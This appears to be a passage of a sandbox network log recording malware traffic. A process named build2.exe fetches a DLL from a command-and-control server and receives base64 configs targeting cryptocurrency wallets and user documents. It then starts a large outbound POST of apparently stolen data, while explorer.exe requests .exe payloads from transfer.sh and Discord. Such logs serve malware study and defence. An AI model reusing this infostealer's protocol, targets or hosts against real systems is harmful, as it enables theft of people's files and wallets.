2024-05-25 19:30:21 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-05-25 19:30:21 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49801	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:22 UTC	178	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
2024-05-25 19:30:23 UTC	245	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:22 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
2024-05-25 19:30:23 UTC	16139	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-05-25 19:30:23 UTC	16384	IN	Data Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18 Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
2024-05-25 19:30:23 UTC	16384	IN	Data Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47 Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
2024-05-25 19:30:23 UTC	16384	IN	Data Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a Data Ascii: t@++t+t+u+uQ<0\|*<9&w/c5~bASJCtvB
2024-05-25 19:30:23 UTC	15589	IN	Data Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e Data Ascii: \|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49803	104.196.109.209	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:24 UTC	182	OUT	GET /get/Dztc3/3edag44.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: transfer.adttemp.com.br
2024-05-25 19:30:24 UTC	289	IN	HTTP/1.1 404 Not Found Date: Sat, 25 May 2024 19:30:24 GMT Server: Transfer.sh HTTP Server 1.0 Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Content-Length: 15 Connection: close
2024-05-25 19:30:24 UTC	15	IN	Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49804	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:25 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:25 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------KFCFBFHIEBKJKFHIEBFBCont
2024-05-25 19:30:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:30:26 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49807	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:27 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:27 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------CGHCGIIDGDAKFIEBKFCFCont
2024-05-25 19:30:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:30:27 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49808	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:28 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:28 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------CAFBGDHCBAEHIDGCGIDACont
2024-05-25 19:30:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:30:29 UTC	223	IN	Data Raw: 64 34 0d 0a 5a 47 56 6a 64 57 31 6c 62 6e 52 7a 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 4c 6e 52 34 64 43 77 71 4c 6d 52 76 59 79 77 71 4c 6d 52 76 59 33 67 73 4b 69 35 79 64 47 59 73 4b 69 35 34 62 48 4d 73 4b 69 35 34 62 48 4e 34 66 44 45 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 4a 30 5a 69 77 71 4c 6e 68 73 63 79 77 71 4c 6e 68 73 63 33 68 38 4d 54 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: d4ZGVjdW1lbnRzfCVET0NVTUVOVFMlXHwqLnR4dCwqLmRvYywqLmRvY3gsKi5ydGYsKi54bHMsKi54bHN4fDE1MHxmYWxzZXwqd2luZG93cyp8REVTS1RPUHwlREVTS1RPUCVcfCoudHh0LCouZG9jLCouZG9jeCwqLnJ0ZiwqLnhscywqLnhsc3h8MTUwfGZhbHNlfCp3aW5kb3dzKnw=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49809	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:30 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHJEBKJEGHJKECAAKJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:30 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------BGHJEBKJEGHJKECAAKJKCont
2024-05-25 19:30:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:30:31 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49812	162.159.134.233	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:32 UTC	310	OUT	GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com
2024-05-25 19:30:32 UTC	1066	IN	HTTP/1.1 404 Not Found Date: Sat, 25 May 2024 19:30:32 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=_hnx.RasMHd9rAKtQBpiugUN70R9RGSs0a3As8OUYhs-1716665432-1.0.1.1-LMEPxQarqfdvcfblA_as1y5sxEH7NpD4UFtDd9qLMmuZeJm.LuMhukMUSc4NN_d8ONEJPfSM15yZZ1hUjlei.Q; path=/; expires=Sat, 25-May-24 20:00:32 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0dKLbD%2BiyBGP73Z6bVXwH%2FG%2Bkvxq4AAiW14%2B17Gxsui30bAluOyYJUaKH6oYX1Kk%2B8GVcwAawVDDol1JlKjRwOtU6Mk71NnR1SRRLlIZVKwhEypcR2qOzQXUpOmOBanOgPgThg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: _cfuvid=pE84G.l23IqgyDRvhY6ciPU_hh1g3L9g.guRFnWtMhM-1716665432343-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8897f0c81c3478e2-EWR alt-svc: h3=":443"; ma=86400
2024-05-25 19:30:32 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49811	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:32 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFHJKJJJECGDHJJDHDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 104621 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:32 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------FCFHJKJJJECGDHJJDHDACont
2024-05-25 19:30:32 UTC	16355	OUT	Data Raw: 70 53 73 6e 4f 31 31 66 54 53 2f 77 44 6d 64 64 65 76 69 73 52 54 68 54 71 4a 74 51 76 5a 32 64 39 62 62 2f 63 51 30 55 73 53 76 4f 38 61 51 52 53 79 74 4b 78 53 4d 52 78 73 32 39 67 4d 6b 44 41 35 49 48 4f 50 53 6c 6d 6a 6c 74 70 4a 49 37 69 43 65 47 53 4a 51 38 69 79 52 4d 70 52 53 63 41 6b 45 63 44 4a 48 4a 72 73 39 72 43 39 72 6f 35 50 59 31 47 72 38 72 74 36 44 61 4b 52 38 78 78 4c 4c 49 6a 70 47 2b 4e 72 73 68 43 74 6e 6b 59 50 51 30 48 4b 6c 41 59 35 51 58 63 52 70 6d 4e 76 6d 59 67 45 41 63 63 6b 68 6c 4f 50 51 6a 31 70 2b 30 68 33 46 37 4b 70 2f 4b 2f 75 46 70 4b 43 53 72 68 48 56 30 59 35 77 48 51 71 54 67 6b 48 72 36 45 45 66 55 